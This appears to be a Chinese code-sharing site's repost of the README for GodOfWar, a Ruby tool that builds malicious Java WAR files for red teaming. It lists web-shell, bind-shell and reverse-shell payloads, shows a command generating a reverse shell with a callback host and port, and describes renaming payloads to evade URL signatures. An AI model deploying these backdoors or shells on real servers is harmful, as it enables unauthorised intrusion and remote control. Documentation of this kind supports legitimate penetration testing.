首页 开发教程 正文
我要发布

godofwar

开发教程
2025-12-07 0 750

GodOfWar – Malicious Java WAR builder

A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.

                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh\'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Malicious Java WAR builder.

Features

  • Preexisting payloads. (try -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Configurable backdoor. (try --host/--port)
  • Control over payload name.
    • To avoid malicious name after deployment to bypass URL name signatures.

Installation

$ gem install godofwar

Usage

$ godofwar -h 

Help menu:
   -p, --payload PAYLOAD            Generates war from one of the available payloads.
                                        (check -l/--list)
   -H, --host IP_ADDR               Local or Remote IP address for the chosen payload
                                        (used with -p/--payload)
   -P, --port PORT                  Local or Remote Port for the chosen payload
                                        (used with -p/--payload)
   -o, --output [FILE]              Output file and the deployment name.
                                        (default is the payload original name. check \'-l/--list\')
   -l, --list                       list all available payloads.
   -h, --help                       Show this help message.

Example

List all payloads

$ godofwar -l
├── cmd_get
│   └── Information:
│       ├── Description: Command execution via web interface
│       ├── OS:          any
│       ├── Settings:    {\"false\"=>\"No Settings required!\"}
│       ├── Usage:       http://hos*t*/cmd*.jsp?cmd=whoami
│       ├── References:  [\"https://*github*.*com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp\"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Information:
│       ├── Description: Remote file browser, upload, download, unzip files and native command execution
│       ├── OS:          any
│       ├── Settings:    {\"false\"=>\"No Settings required!\"}
│       ├── Usage:       http://h*o*st/fi*lebrowser.jsp
│       ├── References:  [\"http://www.*von**loesch.de/filebrowser.html\"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Information:
│       ├── Description: TCP bind shell
│       ├── OS:          any
│       ├── Settings:    {\"port\"=>4444, \"false\"=>\"No Settings required!\"}
│       ├── Usage:       http://**host/r*everse-shell.jsp
│       ├── References:  [\"Metasploit - msfvenom -p java/jsp_shell_bind_tcp\"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Information:
│       ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│       ├── OS:          any
│       ├── Settings:    {\"host\"=>\"attacker\", \"port\"=>4444, \"false\"=>\"No Settings required!\"}
│       ├── Usage:       http://host**/re*verse_shell_ui.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Information:
│       ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
│       ├── OS:          any
│       ├── Settings:    {\"host\"=>\"attacker\", \"port\"=>4444, \"false\"=>\"No Settings required!\"}
│       ├── Usage:       http://ho*st/*r*everse_shell.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Generate payload with LHOST and LPORT

godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

After deployment, you can visit your shell on (http://hos***t:8080/puppy/puppy.jsp)

Contributing

  1. Fork it ( https://gi*th*ub.c*om/KINGSABRI/godofwar/fork ).
  2. Create your feature branch (git checkout -b my-new-feature).
  3. Commit your changes (git commit -am \’Add some feature\’).
  4. Push to the branch (git push origin my-new-feature).
  5. Create a new Pull Request.

Add More Backdoors

To contribute by adding more backdoors:

  1. create a new folder under payloads directory.
  2. put your jsp file under the newly created directory (make it the same directory name).
  3. update payloads_info.json file with
    1. description.
    2. supported operating system (try to make it universal though).
    3. configurations: default host and port.
    4. references: the payload origin or its creator credits.

License

The gem is available as open source under the terms of the MIT License.

下载源码

通过命令行克隆项目:

git clone https://github.com/KINGSABRI/godofwar.git

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

申明:本文由第三方发布,内容仅代表作者观点,与本网站无关。对本文以及其中全部或者部分内容的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。本网发布或转载文章出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,也不代表本网对其真实性负责。

左子网 开发教程 godofwar https://www.zuozi.net/31485.html

Bitcoin Payment Gateway ASP.NET
上一篇: Bitcoin Payment Gateway ASP.NET
PharmAssistant
下一篇: PharmAssistant
常见问题

发货方式是什么?

  • 1、自动:拍下后,点击(下载)链接即可下载;2、手动:拍下后,联系卖家发放即可或者联系官方找开发者发货。
查看详情

交易周期是多久呢?

  • 1、源码默认交易周期:手动发货商品为1-3天,并且用户付款金额将会进入平台担保直到交易完成或者3-7天即可发放,如遇纠纷无限期延长收款金额直至纠纷解决或者退款!;
查看详情

能退款么?

  • 1、描述:源码描述(含标题)与实际源码不一致的(例:货不对板); 2、演示:有演示站时,与实际源码小于95%一致的(但描述中有”不保证完全一样、有变化的可能性”类似显著声明的除外); 3、发货:不发货可无理由退款; 4、安装:免费提供安装服务的源码但卖家不履行的; 5、收费:价格虚标,额外收取其他费用的(但描述中有显著声明或双方交易前有商定的除外); 6、其他:如质量方面的硬性常规问题BUG等。 注:经核实符合上述任一,均支持退款,但卖家予以积极解决问题则除外。
查看详情

注意事项

  • 1、左子会对双方交易的过程及交易商品的快照进行永久存档,以确保交易的真实、有效、安全! 2、左子无法对如“永久包更新”、“永久技术支持”等类似交易之后的商家承诺做担保,请买家自行鉴别; 3、在源码同时有网站演示与图片演示,且站演与图演不一致时,默认按图演作为纠纷评判依据(特别声明或有商定除外); 4、在没有”无任何正当退款依据”的前提下,商品写有”一旦售出,概不支持退款”等类似的声明,视为无效声明; 5、在未拍下前,双方在QQ上所商定的交易内容,亦可成为纠纷评判依据(商定与描述冲突时,商定为准); 6、因聊天记录可作为纠纷评判依据,故双方联系时,只与对方在左子上所留的QQ、手机号沟通,以防对方不承认自我承诺。 7、虽然交易产生纠纷的几率很小,但一定要保留如聊天记录、手机短信等这样的重要信息,以防产生纠纷时便于左子介入快速处理。
查看详情

相关文章

猜你喜欢
发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

联系官方团队 在线提交工单
TA的动态
左子网

分享最新WordPress教程共同学习,共同进步,共同成长!

QQ交流群
左子网

QQ交流群

您的支持,是我们最大的动力! https://qm.qq.com/q/iR7Nj0TrOg
热门文章
热门标签
随机推荐
热门评论
终身VIP会员限时钜惠
首页 源码 菜单 案例 我的